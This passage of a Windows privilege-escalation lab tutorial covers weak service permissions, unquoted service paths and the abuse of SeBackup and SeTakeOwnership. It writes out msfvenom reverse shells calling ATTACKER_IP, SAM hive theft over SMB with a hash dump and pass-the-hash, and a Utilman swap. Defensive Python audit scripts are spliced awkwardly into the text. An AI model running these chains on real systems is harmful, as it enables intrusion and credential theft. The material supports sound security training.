![Service DACL](images/d8244cfd9d64a7be30f5fb0308fd0806.png)

All of the service configurations are stored in the registry under `HKLM\SYSTEM\CurrentControlSet\Services\`:

![Service registry entries](images/06c05c134e4922ec8ff8d9b56382c58f.png)

A subkey exists for every service in the system. Again, we can see the associated executable in the ImagePath value and the account used to start the service in the ObjectName value. If a DACL has been configured for the service, it will be stored in a subkey called Security. As you have guessed by now, only administrators can modify such registry entries by default.

## Insecure Permissions on Service Executable

If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially.

To understand how this works, let's look at a vulnerability found in Splinterware System Scheduler. To start, we will query the service configuration using `sc`:

```
C:\> sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: windowsscheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\PROGRA~2\SYSTEM~1\WService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Scheduler Service
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcuser1
```

We can see that the service installed by the vulnerable software runs as svcuser1 and the executable associated with the service is in `C:\Progra~2\System~1\WService.exe`.
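Before checking the permissions by hand, here is the same check automated, as an added example that is not part of these notes: it parses the text `icacls` prints for one object and flags any ACE that grants a write-capable right (F, M, W, WD, AD, WDAC or WO) to Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE. One parser covers both the scheduled-task binary from the Other Quick Wins section and the service executable discussed here. The three listings embedded in the script are constructed samples: two mirror the `icacls` outputs shown in these notes and one is a correctly permissioned binary whose path contains a space, which is why the path is stripped by name rather than by splitting on spaces.

```python
import re
from typing import List, Set, Tuple

# icacls prints inheritance/propagation flags in the same parenthesised list as
# the rights, e.g. "BUILTIN\Users:(I)(OI)(CI)(RX)"; these tokens are not rights.
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# Rights that let the holder change the object: full, modify, write, write data
# (add file), append data (add subdirectory), write DACL, write owner.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}

# Principals that every local non-admin user is effectively a member of.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<aces>(?:\([^)]*\))+)$")

Ace = Tuple[str, Set[str], Set[str]]  # (principal, flags, rights)


def parse_icacls(path: str, output: str) -> List[Ace]:
    """Parse what `icacls <path>` prints for one object into (principal, flags, rights)."""
    aces: List[Ace] = []
    first = True
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if first:
            # The first ACE shares its line with the path; strip the path by
            # name rather than splitting on spaces, since paths may contain them.
            first = False
            if line.lower().startswith(path.lower()):
                line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = [
            t.strip().upper()
            for group in re.findall(r"\(([^)]*)\)", m.group("aces"))
            for t in group.split(",")
            if t.strip()
        ]
        flags = {t for t in tokens if t in INHERITANCE_FLAGS or t == "DENY"}
        rights = {t for t in tokens if t not in flags}
        aces.append((m.group("principal").strip(), flags, rights))
    return aces


def writable_by_low_priv(path: str, output: str, extra_principals: Tuple[str, ...] = ()) -> List[Tuple[str, Set[str]]]:
    """(principal, write rights) for every ACE that lets a low-privileged principal
    (or one named in extra_principals, e.g. the current user) modify the object.
    Deny ACEs are skipped because they remove rights rather than grant them."""
    suspects = LOW_PRIV_PRINCIPALS | {p.lower() for p in extra_principals}
    hits: List[Tuple[str, Set[str]]] = []
    for principal, flags, rights in parse_icacls(path, output):
        if "DENY" in flags or principal.lower() not in suspects:
            continue
        granted = rights & WRITE_RIGHTS
        if granted:
            hits.append((principal, granted))
    return hits


# Constructed samples mirroring the icacls listings shown in these notes.
SCHTASK_BAT = r"""c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)
                     BUILTIN\Users:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

WSERVICE_EXE = r"""C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed listing of a correctly permissioned service binary (note the
# space in the path): only SYSTEM and Administrators can write to it.
HARDENED_EXE = r"""C:\Program Files\Good App\svc.exe NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
"""

if __name__ == "__main__":
    for path, listing in [
        (r"c:\tasks\schtask.bat", SCHTASK_BAT),
        (r"C:\PROGRA~2\SYSTEM~1\WService.exe", WSERVICE_EXE),
        (r"C:\Program Files\Good App\svc.exe", HARDENED_EXE),
    ]:
        hits = writable_by_low_priv(path, listing)
        verdict = ("WRITABLE by " + ", ".join(f"{p} ({'/'.join(sorted(r))})" for p, r in hits)) if hits else "ok"
        print(f"{path}: {verdict}")
```

Feed it the real output of `icacls` over every "Task To Run" and BINARY_PATH_NAME on a host and anything it reports is a finding to fix with `icacls <file> /remove:g Everyone` (or the offending group) and a re-check. The AD/WD pair matters for directories, not just files; that is the case the Unquoted Service Paths section covers.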
We then proceed to check the permissions on the executable:

```
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
```

And here we have something interesting. The Everyone group has modify permissions (M) on the service's executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account.

Let's generate an exe-service payload using msfvenom and serve it through a python webserver:

Kali Linux

```
user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe

user@attackerpc$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

We can then pull the payload from PowerShell with the following command:

Powershell

```
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe
```

Once the payload is on the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well:

```
C:\> cd C:\PROGRA~2\SYSTEM~1

C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
        1 file(s) moved.

C:\PROGRA~2\SYSTEM~1> move C:\Users\thm-unpriv\rev-svc.exe WService.exe
        1 file(s) moved.

C:\PROGRA~2\SYSTEM~1> icacls WService.exe /grant Everyone:F
Successfully processed 1 files.
```

We start a reverse listener on our attacker machine:

Kali Linux

```
user@attackerpc$ nc -lvp 4445
```

And finally, restart the service. While in a normal scenario you would likely have to wait for a service restart, you have been assigned privileges to restart the service yourself to save you some time. Use the following commands from a cmd.exe command prompt:

```
C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler
```

Note: PowerShell has `sc` as an alias to `Set-Content`, therefore you need to use `sc.exe` in order to control services with PowerShell this way.

As a result, you'll get a reverse shell with svcusr1 privileges:

Kali Linux

```
user@attackerpc$ nc -lvp 4445
Listening on 0.0.0.0 4445
Connection received on 10.10.175.90 50649
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
wprivesc1\svcusr1
```

Go to svcusr1 desktop to retrieve a flag. Don't forget to input the flag at the end of this task.

## Unquoted Service Paths

When we can't directly write into service executables as before, there might still be a chance to force a service into running arbitrary executables by using a rather obscure feature.

When working with Windows services, a very particular behaviour occurs when the service is configured to point to an "unquoted" executable. By unquoted, we mean that the path of the associated executable isn't properly quoted to account for spaces on the command.

As an example, let's look at the difference between two services (these services are used as examples only and might not be available on your machine).
The first service uses proper quotation, so the SCM knows without a doubt that it has to execute the binary file pointed to by `"C:\Program Files\RealVNC\VNC Server\vncserver.exe"`, followed by the given parameters:

```
C:\> sc qc "vncserver"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: vncserver
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VNC Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```

Remember: PowerShell has `sc` as an alias to `Set-Content`, therefore you need to use `sc.exe` to control services if you are in a PowerShell prompt.

Now let's look at another service without proper quotation:

```
C:\> sc qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disk sorter enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcusr2
```

When the SCM tries to execute the associated binary, a problem arises. Since there are spaces in the name of the "Disk Sorter Enterprise" folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute:

| Command | Argument 1 | Argument 2 |
| --- | --- | --- |
| C:\MyPrograms\Disk.exe | Sorter | Enterprise\bin\disksrs.exe |
| C:\MyPrograms\Disk Sorter.exe | Enterprise\bin\disksrs.exe | |
| C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe | | |

This has to do with how the command prompt parses a command.
Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the "right" interpretation of the unquoted command would be to execute `C:\MyPrograms\Disk.exe` and take the rest as arguments.

Instead of failing as it probably should, the SCM tries to help the user and starts searching for each of the binaries in the order shown in the table:

1. First, search for `C:\MyPrograms\Disk.exe`. If it exists, the service will run this executable.
2. If it doesn't exist, search for `C:\MyPrograms\Disk Sorter.exe`. If it exists, the service will run this executable.
3. If that doesn't exist either, search for `C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe`. This option is expected to succeed and will typically be run in a default installation.

From this behaviour, the problem becomes evident. If an attacker creates any of the executables that are searched for before the expected service executable, they can force the service to run an arbitrary executable.

While this sounds trivial, most service executables will be installed under `C:\Program Files` or `C:\Program Files (x86)` by default, which isn't writable by unprivileged users. This prevents any vulnerable service from being exploited. There are exceptions to this rule:

- Some installers change the permissions on the installed folders, making the services vulnerable.
- An administrator might decide to install the service binaries in a non-default path. If such a path is world-writable, the vulnerability can be exploited.

In our case, the Administrator installed the Disk Sorter binaries under `c:\MyPrograms`. By default, this inherits the permissions of the `C:\` directory, which allows any user to create files and folders in it.
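The search order just described, as an added example that is not part of these notes: the script reads a `sc qc` listing, splits an unquoted BINARY_PATH_NAME the way the SCM does (cut at each space, append `.exe` when the prefix has no extension, stop at the first prefix that already names an `.exe`) and returns the executables that would be tried before the real one, each paired with the directory it would have to be planted in. That list of directories is exactly what an auditor needs to check for AD/WD rights granted to Everyone or BUILTIN\Users. The two `sc qc` listings embedded below are constructed copies of the vncserver and Disk Sorter outputs shown above; the key/value parsing is an assumption about the text layout of that command's output, and the two extra paths in the test cases (a no-space path with arguments, and a spaced path followed by arguments) are constructed to show where the search stops.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# "KEY : value" lines as printed by `sc qc`; the header "[SC] ..." does not match.
FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*?)\s*$")


def parse_sc_qc(output: str) -> Dict[str, str]:
    """Turn the KEY : value lines printed by `sc qc <service>` into a dict."""
    fields: Dict[str, str] = {}
    for line in output.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def scm_search_order(binary_path_name: str) -> List[str]:
    """Executables the SCM would try, in order, for a BINARY_PATH_NAME.

    For an unquoted path the command line is cut at each space, ".exe" is
    appended when the prefix has no extension, and the search stops at the
    first prefix that already names an .exe (anything after it is arguments).
    A quoted image path is unambiguous and yields a single candidate.
    """
    cmd = binary_path_name.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return [cmd[1:end] if end > 0 else cmd.strip('"')]
    order: List[str] = []
    tokens = cmd.split(" ")
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        is_image = prefix.lower().endswith(".exe")
        if not is_image and "." not in ntpath.basename(prefix):
            prefix += ".exe"
        order.append(prefix)
        if is_image:
            break
    return order


def hijack_candidates(binary_path_name: str) -> List[Tuple[str, str]]:
    """(executable, directory) pairs the SCM would try before the real image.

    Each directory is one an auditor must check for AD/WD rights granted to
    Everyone or BUILTIN\\Users; if none of them is writable, the unquoted
    path is a hygiene issue but not an escalation.
    """
    order = scm_search_order(binary_path_name)
    return [(exe, ntpath.dirname(exe)) for exe in order[:-1]]


def audit_service(sc_qc_output: str) -> Dict[str, object]:
    """Summarise one `sc qc` listing: who the service runs as and what could be planted."""
    fields = parse_sc_qc(sc_qc_output)
    image = fields.get("BINARY_PATH_NAME", "")
    return {
        "service": fields.get("SERVICE_NAME", ""),
        "runs_as": fields.get("SERVICE_START_NAME", ""),
        "quoted": image.startswith('"'),
        "candidates": hijack_candidates(image),
    }


# Constructed `sc qc` listings mirroring the two services shown above.
VNCSERVER = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: vncserver
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VNC Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

DISK_SORTER = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disk sorter enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : .\svcusr2
"""

if __name__ == "__main__":
    for listing in (VNCSERVER, DISK_SORTER):
        r = audit_service(listing)
        print(f"{r['service']} (runs as {r['runs_as']}): quoted={r['quoted']}")
        for exe, directory in r["candidates"]:
            print(f"  would run {exe} first if it existed -> check write access on {directory}")
```

Run over `sc qc` output for every service on a host, the pairs it returns are the only places an unquoted path can be abused, so the fix is either to quote BINARY_PATH_NAME (`sc config <service> binPath= "\"C:\path with spaces\svc.exe\""`) or to make sure none of those directories grants AD/WD to low-privileged groups.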
We can check this using `icacls`:

```
C:\>icacls c:\MyPrograms
c:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
              BUILTIN\Administrators:(I)(OI)(CI)(F)
              BUILTIN\Users:(I)(OI)(CI)(RX)
              BUILTIN\Users:(I)(CI)(AD)
              BUILTIN\Users:(I)(CI)(WD)
              CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
```

The `BUILTIN\Users` group has AD and WD privileges, allowing the user to create subdirectories and files, respectively.

The process of creating an exe-service payload with msfvenom and transferring it to the target host is the same as before, so feel free to create the following payload and upload it to the server as before. We will also start a listener to receive the reverse shell when it gets executed:

Kali Linux

```
user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe

user@attackerpc$ nc -lvp 4446
```

Once the payload is on the server, move it to any of the locations where hijacking might occur. In this case, we will be moving our payload to `C:\MyPrograms\Disk.exe`. We will also grant Everyone full permissions on the file to make sure it can be executed by the service:

```
C:\> move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe

C:\> icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Successfully processed 1 files.
```

Once the service gets restarted, your payload should execute:

```
C:\> sc stop "disk sorter enterprise"
C:\> sc start "disk sorter enterprise"
```

As a result, you'll get a reverse shell with svcusr2 privileges:

Kali Linux

```
user@attackerpc$ nc -lvp 4446
Listening on 0.0.0.0 4446
Connection received on 10.10.175.90 50650
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
wprivesc1\svcusr2
```

Go to svcusr2 desktop to retrieve a flag. Don't forget to input the flag at the end of this task.

## Insecure Service Permissions

You might still have a slight chance of taking advantage of a service if the service's executable DACL is well configured and the service's binary path is rightly quoted. Should the service DACL (not the service's executable DACL) allow you to modify the configuration of a service, you will be able to reconfigure the service. This will allow you to point to any executable you need and run it with any account you prefer, including SYSTEM itself.

To check for a service DACL from the command line, you can use [Accesschk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) from the Sysinternals suite. For your convenience, a copy is available at `C:\tools`.
The command to check for the thmservice service DACL is:

```
C:\tools\AccessChk> accesschk64.exe -qlc thmservice
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS
```

Here we can see that the `BUILTIN\Users` group has the SERVICE_ALL_ACCESS permission, which means any user can reconfigure the service.

Before changing the service, let's build another exe-service reverse shell and start a listener for it on the attacker's machine:

Kali Linux

```
user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe

user@attackerpc$ nc -lvp 4447
```

We will then transfer the reverse shell executable to the target machine and store it in `C:\Users\thm-unpriv\rev-svc3.exe`. Feel free to use wget to transfer your executable and move it to the desired location. Remember to grant permissions to Everyone to execute your payload:

```
C:\> icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
```

To change the service's associated executable and account, we can use the following command (mind the spaces after the equal signs when using sc.exe):

```
C:\> sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
```

Notice we can use any account to run the service. We chose LocalSystem as it is the highest privileged account available.
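The DACL review above done programmatically, as an added example that is not part of these notes: it parses `accesschk -qlc` output, subtracts denied rights from allowed ones per principal, and reports any principal other than SYSTEM, Administrators or TrustedInstaller that holds a right allowing reconfiguration (SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_ALL or GENERIC_WRITE). The thmservice listing embedded below is copied from the output above; the other two listings are constructed, one for a correctly configured service and one showing a deny ACE cancelling an allow.

```python
import re
from typing import Dict, List, Set, Tuple

# One ACE header as printed by `accesschk -qlc <service>`, e.g.
# "[4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users"; the rights follow, indented.
HEADER_RE = re.compile(r"^\[\d+\]\s+(ACCESS_(?:ALLOWED|DENIED)_ACE_TYPE):\s*(.+?)\s*$")

# Rights that let the holder change what the service executes or as whom,
# or take over the service's DACL and grant themselves the rest.
RECONFIGURE_RIGHTS = {
    "SERVICE_ALL_ACCESS",
    "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC",
    "WRITE_OWNER",
    "GENERIC_ALL",
    "GENERIC_WRITE",
}

# Principals expected to hold such rights; anyone else holding them is a finding.
TRUSTED = {"nt authority\\system", "builtin\\administrators", "nt service\\trustedinstaller"}


def parse_accesschk(output: str) -> Dict[str, Tuple[Set[str], Set[str]]]:
    """Map principal -> (allowed rights, denied rights), in first-seen order."""
    acl: Dict[str, Tuple[Set[str], Set[str]]] = {}
    current: Tuple[str, int] = ("", 0)  # (principal, 0 = allow set, 1 = deny set)
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HEADER_RE.match(line)
        if m:
            principal = m.group(2)
            current = (principal, 0 if m.group(1) == "ACCESS_ALLOWED_ACE_TYPE" else 1)
            acl.setdefault(principal, (set(), set()))
        elif current[0] and re.fullmatch(r"[A-Z_]+", line):
            acl[current[0]][current[1]].add(line)
    return acl


def reconfigurable_by(output: str, trusted: Set[str] = TRUSTED) -> List[Tuple[str, Set[str]]]:
    """Untrusted principals that can reconfigure the service, with the rights that allow it."""
    findings: List[Tuple[str, Set[str]]] = []
    for principal, (allowed, denied) in parse_accesschk(output).items():
        if principal.lower() in trusted:
            continue
        effective = (allowed - denied) & RECONFIGURE_RIGHTS
        if effective:
            findings.append((principal, effective))
    return findings


# Copied from the accesschk output shown above for thmservice.
THMSERVICE = r"""[0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
[4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS
"""

# Constructed: a service whose DACL only lets ordinary users query and start it.
HARDENED = r"""[0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
[1] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Administrators
        SERVICE_ALL_ACCESS
[2] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_START
        READ_CONTROL
"""

# Constructed: a deny ACE cancels the change-config right granted by a later allow ACE.
DENIED = r"""[0] ACCESS_DENIED_ACE_TYPE: NT AUTHORITY\Authenticated Users
        SERVICE_CHANGE_CONFIG
[1] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\Authenticated Users
        SERVICE_CHANGE_CONFIG
        SERVICE_START
"""

if __name__ == "__main__":
    for name, listing in (("thmservice", THMSERVICE), ("hardened", HARDENED), ("denied", DENIED)):
        hits = reconfigurable_by(listing)
        print(name, "->", hits or "no untrusted principal can reconfigure")
```

The same DACL is what Windows keeps in the service's Security registry subkey mentioned earlier, and `sc sdshow <service>` prints it as an SDDL string if Sysinternals is not available; SERVICE_START and SERVICE_STOP alone are not flagged here because they only become dangerous together with a writable binary or an unquoted path, which the two previous checks cover.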
To trigger our payload, all that remains is restarting the service:

```
C:\> sc stop THMService
C:\> sc start THMService
```

And we will receive a shell back on our attacker's machine with SYSTEM privileges:

Kali Linux

```
user@attackerpc$ nc -lvp 4447
Listening on 0.0.0.0 4447
Connection received on 10.10.175.90 50650
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
NT AUTHORITY\SYSTEM
```

Go to the Administrator's desktop to retrieve a flag. Don't forget to input the flag at the end of this task.

# Abusing dangerous privileges

## Windows Privileges

Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.

Each user has a set of assigned privileges that can be checked with the following command:

```
whoami /priv
```

A complete list of available privileges on Windows systems is available [here](https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants). From an attacker's standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on the [Priv2Admin](https://github.com/gtworek/Priv2Admin) GitHub project.

While we won't take a look at each of them, we will showcase how to abuse some of the most common privileges you can find.

## SeBackup / SeRestore

The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place.
The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.

Having this power, an attacker can trivially escalate privileges on the system using many techniques. The one we will look at consists of copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.

The account we are using is part of the "Backup Operators" group, which by default is granted the SeBackup and SeRestore privileges. We will need to open a command prompt using the "Open as administrator" option to use these privileges. We will be asked to input our password again to get an elevated console:

![Run as admin](images/befb434f15dbd4deee0654f8b6ef6de0.png)

Once on the command prompt, we can check our privileges with the following command:

```
C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```

To back up the SAM and SYSTEM hives, we can use the following commands:

```
C:\> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.

C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.
```

This will create a couple of files with the registry hives' content. We can now copy these files to our attacker machine using SMB or any other available method.
For SMB, we can use impacket's `smbserver.py` to start a simple SMB server with a network share in the current directory of our AttackBox:

Kali Linux

```
user@attackerpc$ mkdir share
user@attackerpc$ python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
```

This will create a share named `public` pointing to the `share` directory, which requires the username and password of our current Windows session. After this, we can use the `copy` command on our Windows machine to transfer both files to our AttackBox:

```
C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\
```

And use impacket to retrieve the users' password hashes:

Kali Linux

```
user@attackerpc$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```

We can finally use the Administrator's hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges:

Kali Linux

```
user@attackerpc$ python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@MACHINE_IP
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.175.90.....
[*] Found writable share ADMIN$
[*] Uploading file nfhtabqO.exe
[*] Opening SVCManager on 10.10.175.90.....
[*] Creating service RoLE on 10.10.175.90.....
[*] Starting service RoLE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

## SeTakeOwnership

The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as SYSTEM and take ownership of the service's executable. For this task, we will be taking a different route, however.

To get the SeTakeOwnership privilege, we need to open a command prompt using the "Open as administrator" option. We will be asked to input our password to get an elevated console:

![Run as admin](images/33303d0cde736589d2838ee894379ff2.png)

Once on the command prompt, we can check our privileges with the following command:

```
C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Disabled
```

We'll abuse `utilman.exe` to escalate privileges this time.
Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen:

![utilman normal behaviour](images/a5437a609e41d982b320967667e9b97a.png)

Since Utilman is run with SYSTEM privileges, we will effectively gain SYSTEM privileges if we replace the original binary with any payload we like. As we can take ownership of any file, replacing it is trivial.

To replace utilman, we will start by taking ownership of it with the following command:

```
C:\> takeown /f C:\Windows\System32\Utilman.exe

SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership".
```

Notice that being the owner of a file doesn't necessarily mean that you have privileges over it, but as the owner you can assign yourself any privileges you need. To give your user full permissions over utilman.exe you can use the following command:

```
C:\> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: Utilman.exe
Successfully processed 1 files; Failed processing 0 files
```

After this, we will replace utilman.exe with a copy of cmd.exe:

```
C:\Windows\System32\> copy cmd.exe utilman.exe
        1 file(s) copied.
```

To trigger utilman, we will lock our screen from the start button:

![lock screen](images/dd7290ca93369cee33182023cb9190ff.png)

And finally, proceed to click on the "Ease of Access" button, which runs utilman.exe with SYSTEM privileges. Since we replaced it with a cmd.exe copy, we will get a command prompt with SYSTEM privileges:

![utilman shell](images/1401bc3dcb1e4eb84f526b95567a5ef8.png)

